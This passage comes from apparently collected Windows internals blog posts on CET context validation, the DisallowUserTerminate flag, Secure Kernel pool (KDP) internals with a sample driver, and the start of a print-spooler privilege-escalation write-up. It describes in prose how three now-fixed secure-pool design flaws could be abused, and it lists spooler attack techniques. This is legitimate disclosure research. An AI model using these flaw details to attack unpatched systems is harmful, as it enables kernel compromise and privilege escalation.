            return STATUS_SUCCESS;
        }
        return STATUS_SUCCESS;
    }
}

At first look, this might seem like a lot and could be confusing. But with some context it becomes a lot clearer. When implementing CET support, Microsoft ran into a problem. NtSetContextThread is widely used across the system by processes that don’t necessarily respect the new “rules” of CET, and might use it to set RIP to addresses that are not found in the shadow stack. Those processes might also unwind into addresses that are not considered valid by CET, and since they were not compiled with proper CET support they will not have Static nor Dynamic Exception Handler Continuation Targets (which we wrote about in the previous post) that are recognized by CET. It won’t be possible to enable CET across the system without breaking all those processes, some of which, like python, are very common. So, an option was added to “relax” CetSetContextIpValidation for those cases.

This check will be done for 2 continue types – all cases of KCONTINUE_SET, and cases of KCONTINUE_UNWIND where RtlVerifyUserUnwindTarget failed.

To know whether we are looking at such a case, KiVerifyContextIpForUserCet reads the IMAGE_LOAD_CONFIG_DIRECTORY structure from the headers of the module that contains the new RIP value. If the module has no image base, no load config or no Exception Handler Continuation Table, the function assumes that this is a module that is incompatible with CET and allows the action. But if the module has an Exception Handler Continuation Table, the new RIP value will be checked against the shadow stack, just as if relaxed mode had not been enabled.

A fun side effect of this is that for any process where “relaxed mode” is enabled, setting the context or unwinding into JIT’ed code will always be permitted.

Load Config Directory Capturing

As part of this change MS also added a new UNWIND_STATE structure (that is our name, as this new structure is not in the public symbols) to hold the load configuration pointer and avoid reading the headers more than once. The new structure looks like this:

typedef struct _UNWIND_STATE
{
    PVOID ImageBase;
    PIMAGE_LOAD_CONFIG_DIRECTORY64 LoadConfig;
    BOOLEAN CheckedLoadConfig;
} UNWIND_STATE, *PUNWIND_STATE;

The CheckedLoadConfig flag is used to indicate that the LoadConfig pointer is already initialized and does not need to be read again. We’ll leave it as an exercise for the reader as to why this change was introduced.

Forward-thinking Downgrades

As hardware supporting CET is about to be released and hopefully become common over the next few years, the Windows implementation of CET doesn’t seem to be fully prepared for the change and it looks like new challenges are only being discovered now. And judging by these “reserved” image flags, it seems that some developers are expecting more CET changes and downgrades in the future…


Critical, Protected, DUT Processes in Windows 10

We are all familiar with Microsoft’s love for creating new and exciting ways to prevent certain processes from being terminated by the user. First were Critical processes in Windows XP 64-bit and Server 2003, which crashed the kernel if you killed them. Then came Protected Process Light (PPL) in Windows 8.1, which prevented you from killing them at all. Perhaps it prevented too many other things too, because in a recent Windows 10 update, build 20161, we see yet another new addition to the EPROCESS flags (Flags3, actually), called DisallowUserTerminate:

As this flag’s name is pretty clear, its purpose doesn’t need much explanation – any process that has this flag set cannot be terminated from user-mode. We can see that in PspProcessOpen:

A user-mode caller can’t open a handle to a process that has the DisallowUserTerminate flag set if the requested access mask contains PROCESS_TERMINATE.
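
A quick way to observe this from user mode is to try to open a vmmem process for termination and watch the call fail (the PID below is just a placeholder for a vmmem process on a machine running build 20161 or later):

HANDLE processHandle;
DWORD vmmemPid = 1234;    // placeholder - use the PID of a vmmem process on your system

processHandle = OpenProcess(PROCESS_TERMINATE, FALSE, vmmemPid);
if (processHandle == NULL)
{
    //
    // With DisallowUserTerminate set this should fail with ERROR_ACCESS_DENIED,
    // since the check happens in PspProcessOpen rather than in the process ACL
    //
    printf("OpenProcess failed: %lu\n", GetLastError());
}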

So where is this flag set, and does this mean you can protect your processes from termination? The answer to the second question is simple – not really. For now, this flag can only be set by one path, and it’s one specifically used for creating Hyper-V Memory Host (vmmem) processes.

Internally, this flag is set on process creation by PspAllocateProcess, based on the input parameter CreateFlags – flag 8 (let’s call it PSP_CREATE_PROCESS_FLAG_DISALLOW_TERMINATE) is what sets DisallowUserTerminate as you can see below:

Unfortunately, this function only has 2 external callers, which always pass in 0 as CreateFlags, which obviously doesn’t allow one to set any of these flags. The third, internal, caller is PsCreateMinimalProcess, which has a few internal uses in the system, such as the creation of Pico Processes used by WSL, and other special system processes such as “Memory Compression” and “Registry”. Minimal processes are also created by VmCreateMemoryProcesses, which is one of the APIs that’s exported through the VID Extension Host that Gabrielle, Alex, and I described in our INFILTRATE 2020 talk.

Unlike the exported functions, the PsCreateMinimalProcess internal API receives the CreateFlags from its callers and forwards them to PspAllocateProcess, and VmCreateMemoryProcesses passes in PSP_CREATE_PROCESS_FLAG_DISALLOW_TERMINATE (0x8) unconditionally, as well as PSP_CREATE_PROCESS_FLAG_VM_PROCESSOR_HOST (0x4) if flag 0x20 (let’s call it VMP_CREATE_PROCESS_FLAG_VM_PROCESSOR_HOST) was sent to it. You can see this logic below:

As mentioned, looking for callers for this function in IDA will not show any results, because this function, which is not exported, is shared with Vid.sys through an extension host and called by VsmmNtSlatMemoryProcessCreate when new vmmem processes are needed to manage memory in virtual machines managed by Hyper-V, and/or to contain the Virtual Processor (VP) scheduler threads when eXtended Scheduling (XS) is enabled as part of Windows Defender Application Guard (WDAG), Windows Containers, or Windows Sandbox.

Checking the value of Flags3 in vmmem processes in the new build shows that DisallowUserTerminate is enabled for these processes:

Sadly, no other process can use this capability for now without manually editing the EPROCESS structure, which is extremely not recommended, as any code doing this is bound to break often and crash a lot of systems. So I’m sure 5 different AV companies are already adding code to it.

 


Secure Pool Internals : Dynamic KDP Behind The Hood

Starting with Windows 10 Redstone 5 (Version 1809, Build 17763), a lot has changed in the kernel pool. We won’t talk about most of these changes, that will happen in a 70-something page paper that will be published at some point in the future when we can find enough time and ADHD meds to finish it.

One of the more exciting changes, which is being added in Version 2104 and above, is a new type of pool – the secure pool. In short, the secure pool is a pool managed by Securekernel.exe, which operates in Virtual Trust Level 1 (VTL 1), and that cannot be directly modified by anything running in VTL 0. The idea is to allow drivers to keep sensitive information in a location where it is safe from tampering, even by other drivers. Dave Weston first announced this feature, marketed as Kernel Data Protection (KDP), at his BlueHat Shanghai talk in 2019 and Microsoft recently published a blog post presenting it and some of its internal details.

Note that there are two parts to the full KDP implementation: Static KDP, which refers to protecting read-only data sections in driver images, and Dynamic KDP, which refers to the secure pool, the topic of our blog post, which will talk about how to use this new pool and some implementation details, but will not discuss the general implementation of heaps or any of their components that are not specific to the secure pool.

We’ll also mention three separate design flaw vulnerabilities that were found in the original implementation in Build 20124, which were all fixed in 20161. These were identified and fixed through Microsoft’s great Windows Insider Preview Bug Bounty Program for $20000 USD each.

Initialization 

The changes added for this new pool start at boot. In MiInitSystem we can now see a new check for bit 15 in MiFlags, which checks if secure pool is enabled on this machine. Since MI_FLAGS is now in the symbol files, we can see that it corresponds to:

+0x000 StrongPageIdentity : Pos 15, 1 Bit

which is how the kernel knows that Virtualization Based Security (VBS) is enabled on a system with Second Level Address Translation (SLAT) support. This allows the usage of Extended Page Table Entries (EPTEs) to add an additional, hypervisor-managed, layer of protection around physical memory. This is exactly what the secure pool will be relying on.

If the bit is set, MmInitSystem calls VslInitializeSecurePool, passing in MiState.Vs.SystemVaRegions[MiVaSecureNonPagedPool].BaseAddress:

If we compare the symbol files and look at the MI_SYSTEM_VA_TYPE enum, we’ll in fact see that a new member was added with a value of 15: MiVaSecureNonPagedPool:

VslInitializeSecurePool initializes an internal structure sized 0x68 bytes with parameters for the secure call. This structure contains information used to make the secure call, such as the service code to be invoked and up to 12 parameters to be sent to Securekernel. In this case only 2 parameters are used – the requested size for the secure pool (512 GB) and a pointer to receive its base address:

It also initializes the global variables SecurePoolBase and SecurePoolEnd, which will be used to validate the secure pool handle (more on that later). Then it calls VslpEnterIumSecureMode to call into SecureKernel, which will initialize the secure pool itself, passing in the secureCallParams structure that contains the requested parameters. Before Alex’s blog went down, he was working on an interesting series of posts on how the VTL 0 <-> VTL 1 communication infrastructure works, and hopefully it will return at some point, so we’ll skip the details here.

Securekernel unpacks the input parameters, finds the right path for the call, and eventually gets us to SkmmInitializeSecurePool. This function calls SecurePoolMgrInitialize, which does a few checks before initializing the pool.

First it validates that the input parameter SecurePoolBase is not zero and that it is aligned to 16 MB. Then it checks that the secure pool was not already initialized by checking if the global variable SecurePoolBaseAddress is empty:

The next check is for the size. If the supplied size is larger than 256 GB, the function ignores the supplied size and sets it to 256 GB. This is explained in the blog post from Microsoft linked earlier, where the secure kernel is shown to use a 256 GB region for the kernel’s 512 GB range. It’s quite curious that this is done by having the caller supply 512 GB as a size, and the secure kernel ignoring the parameter and overriding it with 256 GB.

Once these checks are done SkmmInitializeSecurePool starts initializing the secure pool. It reserves a Normal Address Range (NAR) descriptor for the address range with SkmiReserveNar and then creates an initial pool descriptor and sets global variables SkmiSecurePoolStart and SkmiSecurePoolNar. Notice that the secure pool has a fixed, hard-coded address at 0xFFFF9B0000000000:

Side note: NAR stands for Normal Address Range. It’s a data structure tracking kernel address space, like VADs are used for user-space memory. Windows Internals, 7th Edition, Part 2, has an amazing section on the secure kernel written by Andrea Allevi.

An interesting variable to look at here is SkmiSecurePoolStart, which gets a value of <SecurePoolBaseInKernel> - <SecurePoolBaseInSecureKernel>. Since the normal kernel and secure kernel have separate address spaces, the secure pool will be mapped at different addresses in each (as we’ve seen, it has a fixed address in the secure kernel and an ASLRed address in the normal kernel). This variable will allow SecureKernel to receive secure pool addresses from the normal kernel and translate them to secure kernel addresses, an ability that is necessary since this pool is meant to be used by the normal kernel and 3rd-party drivers.
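
Put differently, the translation is just a subtraction; a trivial illustration of the logic (the function name here is ours, purely for illustration):

//
// SkmiSecurePoolStart holds <SecurePoolBaseInKernel> - <SecurePoolBaseInSecureKernel>,
// so subtracting it from a VTL 0 secure pool address yields the VTL 1 alias
//
ULONG_PTR
TranslateSecurePoolAddress (
    _In_ ULONG_PTR Vtl0Address,
    _In_ ULONG_PTR SkmiSecurePoolStart
    )
{
    return Vtl0Address - SkmiSecurePoolStart;
}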

After SkmmInitializeSecurePool returns there is another call to SkInitializeSecurePool, which calls SecurePoolMgrInitialize. This function initializes a pool state structure that we chose to call SK_POOL_STATE in the global variable SecurePoolGlobalState.

typedef struct _SK_POOL_STATE
{
    LIST_ENTRY PoolLinks;
    PVOID Lock;
    RTLP_HP_HEAP_MANAGER HeapManager;
    PSEGMENT_HEAP SegmentHeap;
} SK_POOL_STATE, *PSK_POOL_STATE;

Then it starts the heap manager and initializes a bitmap that will be used to mark allocated addresses in the secure pool. Finally, SecurePoolMgrInitialize calls RtlpHpHeapCreate to allocate a heap and create a SEGMENT_HEAP for the secure pool.

The first design flaw in the original implementation is actually related to the SEGMENT_HEAP allocation. This is a subtle point unless someone has pre-read our 70-page book: due to how “metadata” allocations work, the SEGMENT_HEAP ended up being allocated as part of the secure pool, which, as per what we explained here and the Microsoft blog, means that it also ended up mapped in the VTL 0 region that encompasses the secure pool.

Since SEGMENT_HEAP contains pointers to certain functions owned by the heap manager (which, in the secure pool case, is hosted in Securekernel.exe), this resulted in an information leak vulnerability that could lead to the discovery of the VTL 1 base address of SecureKernel.exe (which is ASLRed).

This has now been fixed by no longer mapping the SEGMENT_HEAP structure in the VTL 0 region.

Creation & Destruction

Unlike the normal kernel pool, memory cannot be allocated from the secure pool directly as this would defeat the whole purpose. To get access to the secure pool, a driver first needs to call a new function – ExCreatePool. This function receives Flags, Tag, Params and an output parameter Handle. The function first validates the arguments:

  • Flags must be equal to 3
  • Tag cannot be 0
  • Params must be 0
  • Handle cannot be NULL

After the arguments have been validated, the function makes a secure call to service SECURESERVICE_SECURE_POOL_CREATE, sending in the tag as the only parameter. This will reach the SkSpCreateSecurePool function in Securekernel. This function calls SkobCreateObject to allocate a secure object of type SkSpStateType, and then forwards the allocated structure together with the received Tag to SecurePoolInit, which will populate it. We chose to call this structure SK_POOL, and it contains the following fields:

typedef struct _SK_POOL
{
    LIST_ENTRY PoolLinks;
    PSEGMENT_HEAP SegmentHeap;
    LONG64 PoolAllocs;
    ULONG64 Tag;
    PRTL_CSPARSE_BITMAP AllocBitmapTracker;
} SK_POOL, *PSK_POOL;

It then initializes Tag to the tag supplied by the caller, and SegmentHeap and AllocBitmapTracker to the heap and bitmap that were initialized at boot, which are pointed to by SecurePoolGlobalState.SegmentHeap and the global variable SecurePoolBitmapData. This structure is added to a linked list stored in SecurePoolGlobalState, which we called PoolLinks, and will contain the number of allocations done from it (PoolAllocs is initially set to zero).

Finally, the function calls SkobCreateHandle to create a handle which will be returned to the caller. Now the caller can access the secure pool using this handle.

When the driver no longer needs access to the pool (usually right before unloading), it needs to call ExDestroyPool with the handle it received. This will reach SecurePoolDestroy which checks that this entry contains no allocations (PoolAllocs = 0) and wasn’t modified (PoolEntry.SegmentHeap == SecurePoolGlobalState.SegmentHeap). If the validation was successful, the entry is removed from the list and the structure is freed. From that point the handle is no longer valid and cannot be used.

The second design bug identified in the original build was around what the Handle value contained. In the original design, Handle was an obfuscated value created through the XORing of certain virtual addresses, which was then validated (as you’ll see in the Allocation section below) to point to a SK_POOL structure with the right fields filled out. However, because the Secure Kernel does not use ASLR, the values that are part of the XOR computation were known to VTL 0 attackers.

Therefore, due to the fact that the contents of an SK_POOL can be inferred and built correctly (for the same reason), a VTL 0 attacker could first create a secure pool allocation that corresponds to a fake SK_POOL, compute the address of this allocation in the VTL 1 address range (since, as explained here and in Microsoft’s blog post, there is a known delta), and then use the known XOR computation to supply this as a fake Handle to future Allocation, Update, Deallocation, and Destroy calls.

Among other things, this would allow an attacker to control operations such as the PoolAllocs counter shown earlier, which is incremented/decremented at various times and would then corrupt an adjacent VTL 1 allocation or address (since only the first 16 bytes of SK_POOL are validated).

The fix, which is the new design shown here, leverages the Secure Kernel’s Object Manager to allocate and define a real object, then to create a real secure handle associated with it. Secure objects/handles cannot be faked, other than stealing someone else’s handle, but this results in VTL 0 data corruption, not VTL 1 arbitrary writes.

Allocation

After getting access to the secure pool, the driver can allocate memory through another new exported kernel function – ExAllocatePool3. Officially, this function is documented. But it is documented in such a useless way that it would almost be better if it wasn’t documented at all:

The ExAllocatePool3  routine allocates pool memory of the specified type and returns a pointer to the allocated block. This routine is similar to ExAllocatePool2 but it adds extended parameters.

This tells us basically nothing. But the POOL_EXTENDED_PARAMETER is found in Wdm.h together with the rest of the information we need, so we can get a bit of information from that:

typedef enum POOL_EXTENDED_PARAMETER_TYPE {
    PoolExtendedParameterInvalidType = 0,
    PoolExtendedParameterPriority,
    PoolExtendedParameterSecurePool,
    PoolExtendedParameterMax
} POOL_EXTENDED_PARAMETER_TYPE, *PPOOL_EXTENDED_PARAMETER_TYPE;

#define POOL_EXTENDED_PARAMETER_TYPE_BITS    8
#define POOL_EXTENDED_PARAMETER_REQUIRED_FIELD_BITS    1

#define POOL_EXTENDED_PARAMETER_RESERVED_BITS    (64 - POOL_EXTENDED_PARAMETER_TYPE_BITS - POOL_EXTENDED_PARAMETER_REQUIRED_FIELD_BITS)

#define SECURE_POOL_FLAGS_NONE       0x0
#define SECURE_POOL_FLAGS_FREEABLE   0x1

#define SECURE_POOL_FLAGS_MODIFIABLE 0x2

typedef struct _POOL_EXTENDED_PARAMS_SECURE_POOL {
    HANDLE SecurePoolHandle;
    PVOID Buffer;
    ULONG_PTR Cookie;
    ULONG SecurePoolFlags;
} POOL_EXTENDED_PARAMS_SECURE_POOL;

typedef struct _POOL_EXTENDED_PARAMETER {
    struct {
        ULONG64 Type : POOL_EXTENDED_PARAMETER_TYPE_BITS;
        ULONG64 Optional : POOL_EXTENDED_PARAMETER_REQUIRED_FIELD_BITS;
        ULONG64 Reserved : POOL_EXTENDED_PARAMETER_RESERVED_BITS;
    } DUMMYSTRUCTNAME;
    union {
        ULONG64 Reserved2;
        PVOID Reserved3;
        EX_POOL_PRIORITY Priority;
        POOL_EXTENDED_PARAMS_SECURE_POOL* SecurePoolParams;
    } DUMMYUNIONNAME;
} POOL_EXTENDED_PARAMETER, *PPOOL_EXTENDED_PARAMETER;

typedef CONST POOL_EXTENDED_PARAMETER *PCPOOL_EXTENDED_PARAMETER;

First, when we look at the POOL_EXTENDED_PARAMETER_TYPE enum, we can see 2 options – PoolExtendedParameterPriority and PoolExtendedParameterSecurePool. The official documentation has no mention of secure pool anywhere or which parameters it receives and how. By reading it, you’d think ExAllocatePool3 is just ExAllocatePool2 with an additional “priority” parameter.

So back to ExAllocatePool3 – it takes in the same POOL_FLAGS parameter, but also two new ones  – ExtendedParameters and ExtendedParametersCount:

DECLSPEC_RESTRICT
PVOID
ExAllocatePool3 (
    _In_ POOL_FLAGS Flags,
    _In_ SIZE_T NumberOfBytes,
    _In_ ULONG Tag,
    _In_ PCPOOL_EXTENDED_PARAMETER ExtendedParameters,
    _In_ ULONG ExtendedParametersCount
    );

ExtendedParameters has a Type member, which is one of the values in the POOL_EXTENDED_PARAMETER_TYPE enum. This is the first thing that ExAllocatePool3 looks at:

If the parameter type is 1 (PoolExtendedParameterPriority), the function reads the Priority field and later calls ExAllocatePoolWithTagPriority. If the type is 2 (PoolExtendedParameterSecurePool) the function reads the POOL_EXTENDED_PARAMS_SECURE_POOL structure from ExtendedParameters. Later the information from this structure is passed into ExpSecurePoolAllocate:

Another interesting thing to notice is that for secure pool allocations, ExtendedParametersCount must be one (meaning no other extended parameters are allowed other than the ones related to secure pool) and flags must be POOL_FLAG_NON_PAGED. We already know that the secure pool only initializes one heap, which is NonPaged, so this requirement makes sense.

ExAllocatePool3 reads from ExtendedParameters a handle, buffer, cookie and flags and passes them to ExpSecurePoolAllocate together with the tag and number of bytes for this allocation. Let’s go over each of these new arguments:

  • SecurePoolHandle is the handle received from ExCreatePool
  • Buffer is a memory buffer containing the data to be written into this allocation. Since this is a secure pool that is not writable to drivers running in the normal kernel, SecureKernel must write the data into the allocation. The flags will determine whether this data can be modified later.
  • Flags – The options for flags, as we saw in wdm.h, are SECURE_POOL_FLAGS_MODIFIABLE and SECURE_POOL_FLAGS_FREEABLE. As the names suggest, these determine whether the content of the allocation can be updated after it’s been created and whether this allocation can be freed.
  • Cookie is chosen by the caller and will be used to encode the signature in the header of the new entry, together with the tag.

SkSecurePoolAllocate forwards the parameters to SecurePoolAllocate, which calls SecurePoolAllocateInternal. This function calls RtlpHpAllocateHeap to allocate heap memory in the secure pool, but adds 0x10 bytes to the size requested by the user:

This is done because the first 0x10 bytes of this allocation will be used for a secure pool header:

typedef struct _SK_SECURE_POOL_HEADER
{
    ULONG_PTR Signature;
    ULONG Flags;
    ULONG Reserved;
} SK_SECURE_POOL_HEADER, *PSK_SECURE_POOL_HEADER;

This header contains the Flags sent by the caller (specifying whether this allocation can be modified or freed) and a signature made up of the cookie, XORed with the tag and the handle for the pool. This header will be used by SecureKernel and is not known to the caller, which will receive a pointer to the data, which is written immediately after this header (so the user receives a pointer to <allocation start> + 0x10).

Before initializing the secure pool header, there is a call to SecurePoolAllocTrackerIsAlloc to validate that the header is inside the secure pool range and not inside an already allocated block. This check doesn’t make much sense here, since the header is not a user-supplied address but one that was just allocated by the function itself, but is probably the result of some extra paranoid checks (or an inline macro) that were added as a result of the third design flaw we’ll explain shortly.

Then there is a call to SecurePoolAllocTrackerSetBit, to set the bit in the bitmap to mark this address as allocated, and only then the header is populated. If the allocation was successful, SkPool->PoolAllocs is incremented by 1.

When this address is eventually returned to SkSecurePoolAllocate, it is adjusted to a normal kernel address with SkmiSecurePoolStart and returned to the normal kernel:

Then the driver which requested the allocation can use the returned address to read it. But since this pool is protected from being written to by the normal kernel, if the driver wants to make any changes to the content, assuming that it created a modifiable allocation to begin with, it has to use another new API added for this purpose – ExSecurePoolUpdate.

Going back to the bitmap — why is it necessary to track the allocation? This takes us to the third and final design flaw, which is that a secure pool header could easily be faked, since the information stored in Signature is known — the Cookie is caller-supplied, the Tag is as well, and the SecurePoolHandle too. In fact, in combination with the first flaw this is even worse, as the allocation can then be made to point to a fake SK_POOL.

The idea behind this attack would be to first perform a legitimate allocation of, say, 0x40 bytes. Next, manufacture a fake SK_SECURE_POOL_HEADER at the beginning of the allocation. Finally, pass the address, plus 0x10 (the size of a header), to the Update or Free functions we’ll show next. Now, these functions will use the fake header we’ve just constructed, which among other things can be made to point to a fake SK_POOL, on top of causing issues such as pool shape manipulation, double-frees, and more.

By using a bitmap to track legitimate vs. non-legitimate allocations, fake pool headers immediately lead to a crash.

Updating Secure Pool Allocation

When a driver wants to update the contents of an allocation done in the secure pool, it has to call ExSecurePoolUpdate with the following arguments:

  • SecurePoolHandle – the driver’s handle to the secure pool
  • The Tag that was used for the allocation that should be modified
  • Address of the allocation to be modified
  • Cookie that was used when allocating this memory
  • Offset inside the allocation
  • Size of data to be written
  • Pointer to a buffer containing the new data to write into this allocation

Of course, as you’re about to see, the allocation must have been marked as updateable in the first place.

These arguments are sent to secure kernel through a secure call, where they reach SkSecurePoolUpdate. This function passes the arguments to SecurePoolUpdate, with the allocation address adjusted to point to the correct secure kernel address.

SecurePoolUpdate first validates the pool handle by XORing it with the Signature field of the SEGMENT_HEAP and making sure the result is the address of the SEGMENT_HEAP itself, and then forwards the arguments to SecurePoolUpdateInternal. This function first calls SecurePoolAllocTrackerIsAlloc to check the secure pool bitmap and make sure the supplied address is allocated. Then it does some more internal validation of the allocation by calling SecurePoolValidate – an internal function which validates the input arguments by making sure that the signature field for the allocation matches Cookie ^ SecurePoolHandle ^ Tag:

This check is meant to make sure that the driver that is trying to modify the allocation is the one that made it, since no other driver should have the right cookie and tag that were used when allocating it.
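
As an illustration, here is a minimal sketch of that check, assuming the SK_SECURE_POOL_HEADER layout shown earlier (the function name is ours; this is not the actual SecurePoolValidate code):

BOOLEAN
ValidateSecurePoolSignature (
    _In_ PSK_SECURE_POOL_HEADER Header,
    _In_ ULONG_PTR Cookie,
    _In_ ULONG_PTR SecurePoolHandle,
    _In_ ULONG_PTR Tag
    )
{
    //
    // Only the original caller knows the cookie and tag used at allocation time,
    // so a mismatching signature means a different (or malicious) caller
    //
    return (BOOLEAN)(Header->Signature == (Cookie ^ SecurePoolHandle ^ Tag));
}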

Then SecurePoolUpdateInternal makes a few more checks:

  • Flags field of the header has to have the SECURE_POOL_FLAGS_MODIFIABLE bit set. If this flag was not set when allocating this block, the memory cannot be modified.
  • Size cannot be zero
  • Offset cannot be bigger than the size of the allocation
  • Offset + Size cannot be larger than the size of the allocation (since that would create an overflow that would write over the next allocation)

If any of these checks fail, the function will bugcheck with code 0x13A (KERNEL_MODE_HEAP_CORRUPTION).

Only if all the validations pass will the function write the data from the supplied buffer into the allocation, at the requested offset and size.

Freeing Secure Pool Allocation

The last thing a driver can do with a pool allocation is free it, through ExFreePool2. This function, like ExAllocatePool2/3, receives ExtendedParameters and ExtendedParametersCount. If ExtendedParametersCount is zero, the function will call ExFreeHeapPool to free an allocation done in the normal kernel pool. Otherwise the only valid value for the ExtendedParameters Type field is PoolExtendedParameterSecurePool (2). If the type is correct, the function will read the secure pool parameters and validate that the Flags field is zero and that the other fields are not empty. Then the requested address and tag are sent through a secure call, together with the Cookie and SecurePoolHandle that were read from ExtendedParameters:

The secure kernel functions SecurePoolFree and SecurePoolFreeInternal validate the supplied address, pool handle and the header of the pool allocation that the caller wants to free, and also make sure it was allocated with the SECURE_POOL_FLAGS_FREEABLE flag. If all validations pass, the memory inside the allocation is zeroed and the allocation is freed through RtlpHpFreeHeap. Then the PoolAllocs field in the SK_POOL structure belonging to this handle is decreased and there is another check to see that the value is not below zero.

Code Sample

We wrote a simple example for allocating, modifying and freeing secure pool memory:

#include <wdm.h>

DRIVER_INITIALIZE DriverEntry;
DRIVER_UNLOAD DriverUnload;

HANDLE g_SecurePoolHandle;
PVOID g_Allocation;

VOID
DriverUnload (
    _In_ PDRIVER_OBJECT DriverObject
    )
{
    POOL_EXTENDED_PARAMETER extendedParams[1] = { 0 };
    POOL_EXTENDED_PARAMS_SECURE_POOL securePoolParams = { 0 };
    UNREFERENCED_PARAMETER(DriverObject);

    if (g_SecurePoolHandle != nullptr)
    {
        if (g_Allocation != nullptr)
        {
            extendedParams[0].Type = PoolExtendedParameterSecurePool;
            extendedParams[0].SecurePoolParams = &securePoolParams;
            securePoolParams.Cookie = 0x1234;
            securePoolParams.Buffer = nullptr;
            securePoolParams.SecurePoolFlags = 0;
            securePoolParams.SecurePoolHandle = g_SecurePoolHandle;
            ExFreePool2(g_Allocation, 'mySP', extendedParams, RTL_NUMBER_OF(extendedParams));
        }
        ExDestroyPool(g_SecurePoolHandle);
    }
    return;
}

NTSTATUS
DriverEntry (
    _In_ PDRIVER_OBJECT DriverObject,
    _In_ PUNICODE_STRING RegistryPath
    )
{
    NTSTATUS status;
    POOL_EXTENDED_PARAMETER extendedParams[1] = { 0 };
    POOL_EXTENDED_PARAMS_SECURE_POOL securePoolParams = { 0 };
    ULONG64 buffer = 0x41414141;
    ULONG64 updateBuffer = 0x42424242;
     UNREFERENCED_PARAMETER(RegistryPath);

    DriverObject->DriverUnload = DriverUnload;

    //
    // Create a secure pool handle
    //
    status = ExCreatePool(POOL_CREATE_FLG_SECURE_POOL |
                          POOL_CREATE_FLG_USE_GLOBAL_POOL,
                          'mySP',
                          NULL,
                          &g_SecurePoolHandle);
    if (!NT_SUCCESS(status))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID,
                   DPFLTR_ERROR_LEVEL,
                   "Failed creating secure pool with status %lx\n",
                   status);
        goto Exit;
    }
    DbgPrintEx(DPFLTR_IHVDRIVER_ID,
               DPFLTR_ERROR_LEVEL,
               "Pool: 0x%p\n",
               g_SecurePoolHandle);

    //
    // Make an allocation in the secure pool
    //
    extendedParams[0].Type = PoolExtendedParameterSecurePool;
    extendedParams[0].SecurePoolParams = &securePoolParams;
    securePoolParams.Cookie = 0x1234;
    securePoolParams.SecurePoolFlags = SECURE_POOL_FLAGS_FREEABLE | SECURE_POOL_FLAGS_MODIFIABLE;
    securePoolParams.SecurePoolHandle = g_SecurePoolHandle;
    securePoolParams.Buffer = &buffer;
    g_Allocation = ExAllocatePool3(POOL_FLAG_NON_PAGED,
                                    sizeof(buffer),
                                   'mySP',
                                   extendedParams,
                                   RTL_NUMBER_OF(extendedParams));
    if (g_Allocation == nullptr)
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID,
                   DPFLTR_ERROR_LEVEL,
                   "Failed allocating memory in secure pool\n");
        status = STATUS_UNSUCCESSFUL;
        goto Exit;
    }

    DbgPrintEx(DPFLTR_IHVDRIVER_ID,
               DPFLTR_ERROR_LEVEL,
               "Allocated: 0x%p\n",
               g_Allocation);

    //
    // Update the allocation
    //
    status = ExSecurePoolUpdate(g_SecurePoolHandle,
                                'mySP',
                                g_Allocation,
                                securePoolParams.Cookie,
                                0,
                                sizeof(updateBuffer),
                                &updateBuffer);
    if (!NT_SUCCESS(status))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID,
                  DPFLTR_ERROR_LEVEL,
                   "Failed updating allocation with status %lx\n",
                   status);
        goto Exit;
    }

    DbgPrintEx(DPFLTR_IHVDRIVER_ID,
               DPFLTR_ERROR_LEVEL,
               "Successfully updated allocation\n");

    status = STATUS_SUCCESS;

Exit:
    return status;
}

Conclusion

The secure pool can be a powerful feature to help drivers protect sensitive information from other code running in kernel mode. It allows us to store memory in a way that can’t be modified, and possibly not even freed, by anyone, including the driver that allocated the memory! It has the added benefit of allowing any kernel code to make use of some of the protections of VTL 1, not limiting them to Windows code only.

Like any new feature, this implementation is not perfect and might still have issues, but this is definitely a new and exciting addition that is worth keeping an eye on in upcoming Windows releases.

 


PrintDemon: Print Spooler Privilege Escalation, Persistence & Stealth (CVE-2020-1048 & more)

We promised you there would be a Part 1 to FaxHell, and with today’s Patch Tuesday and CVE-2020-1048, we can finally talk about some of the very exciting technical details of the Windows Print Spooler, and interesting ways it can be used to elevate privileges, bypass EDR rules, gain persistence, and more. Ironically, the Print Spooler continues to be one of the oldest Windows components that still hasn’t gotten much scrutiny, even though it’s largely unchanged since Windows NT 4, and was even famously abused by Stuxnet (using some similar APIs we’ll be looking at!). It’s extra ironic that an underground ‘zine first looked at the Print Spooler, which was never found by Microsoft, and that’s what the team behind Stuxnet ended up using!

First, we’d like to shout out to Peleg Hadar and Tomer Bar from SafeBreach Labs who earned the MSRC acknowledgment for one of the CVEs we’ll describe — there are a few others that both the team and ourselves have found, which may be patched in future releases, so there’s definitely still some dragons hiding. We understand that Peleg and Tomer will be presenting their research at Blackhat USA 2020, which should be an exciting addition to this post.

Secondly, Alex would like to apologize for the naming/branding of a CVE — we did not originally anticipate a patch for this issue to have collided with other research, and we thought that since the Spooler is a service, or a daemon in Unix terms, and given the existence of FaxHell, the name PrintDemon would be appropriate.

Printers, Drivers, Ports, & Jobs

While we typically like to go into the deep, gory, guts of Windows components (it’s an internals blog, after all!), we felt it would be worth keeping things simple, just to emphasize the criticality of these issues in terms of how easy they are to abuse/exploit — while also obviously providing valuable tips for defenders in terms of protecting themselves.

So, to begin with, let’s look at a very simple description of how the printing process works, extremely dumbed down. We won’t talk about monitors or providors (sp) or processors, but rather just the basic printing pipeline.

To begin with, a printer must be associated with a minimum of two elements:

  • A printer port — you’d normally think of this as LPT1 back in the day, or a USB port today, or even a TCP/IP port (and address)
    • Some of you probably know that it can also “FILE:” which means the printer can print to a file (PORTPROMPT: on Windows 8 and above)
  • A printer driver — this used to be a kernel-mode component, but with the new “V4” model, this is all done in user mode for more than a decade now

Because the Spooler service, implemented in Spoolsv.exe, runs with SYSTEM privileges, and is network accessible, these two elements have drawn people to perform all sorts of interesting attacks, such as trying to

  • Printing to a file in a privileged location, hoping Spooler will do that
  • Loading a “printer driver” that’s actually malicious
  • Dropping files remotely using Spooler RPC APIs
  • Injecting “printer drivers” from remote systems
  • Abusing file parsing bugs in EMF/XPS spooler files to gain code execution

Most of these have resulted in actual bugs being found, and some hardening done by Microsoft. That being said, there remain a number of logical issues that one could call downright design flaws, which lead to some interesting behavior.

Back to our topic: to make things work, we must first load a printer driver. You’d naturally expect that this requires privileges, and some MSDN pages still suggest the SeLoadDriverPrivilege is required. However, starting in Vista, to make things easier for Standard User accounts, and due to the fact these now run in user-mode, the reality is more complicated. As long as the driver is a pre-existing, inbox driver, no privileges are needed — whatsoever — to install a print driver.

